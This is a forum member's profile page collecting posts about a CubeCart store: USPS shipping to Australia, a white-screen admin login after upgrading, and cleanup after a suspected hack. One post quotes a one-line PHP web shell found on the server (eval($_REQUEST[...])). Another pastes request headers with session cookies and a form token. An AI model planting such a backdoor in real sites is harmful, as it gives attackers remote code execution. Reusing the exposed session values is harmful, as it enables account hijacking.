Jump to content

islander

Member
  • Posts

    9
  • Joined

  • Last visited

islander's Achievements

Rookie

Rookie (2/14)

  • First Post Rare
  • Conversation Starter Rare
  • Week One Done Rare
  • One Month Later Rare
  • One Year In Rare

Recent Badges

0

Reputation

  1. In Sept. the US Postal Service suspended First Class International packages shipping to Australia. They are referring people to a shipping company called GlobalPost International Shipping. Stamp.com is working with GlobalPost, too. However, GlobalPost options aren't showing up in the USPS CubeCart extension. Anyone know of someone working on a GlobalPost extension for shipping? Thanks!
  2. With Developer Tools in Chrome, I get response status 200 on both the login page and the white screen after I submit the login. Here's the headers from after the login is submitted (with username/password removed, but it was listed correctly--I also altered the admin page name, but it too was listed correctly). I don't see any obvious errors but I don't know how to interpret parts of it. Request URL: https://www.treefrogfarm.com/store/admin_xxx.php Request Method: POST Status Code: 200 Remote Address: 216.92.173.98:443 Referrer Policy: strict-origin-when-cross-origin Response Headers cache-control: pre-check=0, post-check=0, max-age=0 content-encoding: gzip content-type: text/html; charset=UTF-8 date: Tue, 19 Oct 2021 21:50:43 GMT expires: -1 pragma: no-cache server: Apache set-cookie: CCS_B0C4C3B217=bca7de24aee9eb9bf3f50f1e0d9025d6; expires=Tue, 26-Oct-2021 21:50:43 GMT; Max-Age=604800; path=/store; domain=.treefrogfarm.com; secure; HttpOnly; SameSite=None vary: Accept-Encoding x-frame-options: SAMEORIGIN x-powered-by: PHP/7.4.24 Request Headers :authority: www.treefrogfarm.com :method: POST :path: /store/admin_xxx.php :scheme: https accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cache-control: no-cache content-length: 176 content-type: application/x-www-form-urlencoded cookie: CCS_B0C4C3B217=5fd53b369b82009b0ed9e34c5de6ddf7; __utmc=183381347; __utmz=183381347.1630434710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __zlcmid=165kKkjobQZfVNO; _ga=GA1.2.290882159.1630434710; PHPSESSID=f4d343e193cb3f424f941320669d06c5; __utma=183381347.290882159.1630434710.1634628236.1634671021.12 origin: https://www.treefrogfarm.com pragma: no-cache referer: https://www.treefrogfarm.com/store/admin_xxx.php sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: same-origin sec-fetch-user: ?1 upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36 Form Dataview sourceview URL-encoded username: xxxxxxxx password: xxxxxxxxxxxxxxxx redir: https://www.treefrogfarm.com/store/admin_xxx.php?_g=login login: Log In token: d6652a13b7cdc75d9bc2e897c76e0136
  3. I found some php files in a subdirectory /cache/controllers that I don't see in recent versions. They had to do primarily with admin sessions. I've removed them. Thanks for the tip about the Developer's Tools. I had forgotten about that. I'll check it now.
  4. Is it generally safe to delete files and folders that were used in previous versions but not the latest? Omitting things like user files such as images, of course. For example, I have a /phpMailer folder on the server, but the latest version doesn't have that but has /PHPMailer instead. Is it safe to delete the /phpmailer folder? I'm trying to get as close to a clean install as possible. Thanks for the help.
  5. Yes, the storefront works, except customers can't change their passwords. No, I don't have it but will certainly check out the Security Suite as soon as I can get in to admin install it. Yes I'm using a hosted Apache server. I've checked some of the .htaccess files, but will do that again and more thoroughly. Thanks!
  6. I'm following some 2016 instructions for cleaning a hacked store: Step 7 is "If you are not able to login to the admin side of your store please reset the login via the database. " The link to resetting the login yields a 404 error. I think I've done it correctly, though, to change the password, but still can't log into the admin area. Grr.
  7. Yes. I'm always very careful about that. I also double checked the global.inc.php file. Thanks for the suggestion, though!
  8. Last week I upgraded from v6.4.2 to v6.4.4. Everything seemed to be working fine until after the weekend. Now when I enter username/password and click to log in I get a white screen. When I use the password change form, the same thing happens--I click, it seems to submit the form just fine, but all I see is a white screen. I've tried checking the error_log but there is nothing. I've tried enabling "display_errors" in debug.class.php, but nothing. I've also checked to see if something was reconfigured on the hosted server, but no. I'm pretty sure I've been hacked, because I checked the /includes/extra folder and found an /includes/extra-BAD folder as well. Inside the /extra-BAD folder was a snippet file I didn't recognize and a public key code file and some sess_ files. The snippet file contained just one line of PHP code: eval($_REQUEST["4ikT7"]). Here's a sample sess_ file content: __client|a:5:{s:10:"ip_address";s:14:"208.115.113.85";s:9:"useragent";s:90:"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, [email protected])";s:13:"session_start";i:1451332019;s:12:"session_last";i:1451332019;s:8:"language";s:5:"en-US";}__system|a:1:{s:5:"token";s:32:"21828537828a8497b3b39a0f63864d74";}__recaptcha|a:2:{s:5:"error";N;s:9:"confirmed";b:0;} The final "error" was in all of them. I've removed the alien files and folder from the server, of course, but I still can't login. Any ideas? I didn't see any unfamiliar files in /images so not sure if the snippet was used to redirect to other servers or if I've got hacked content someplace else. I could really use help on this one. Thanks, Nancy
×
×
  • Create New...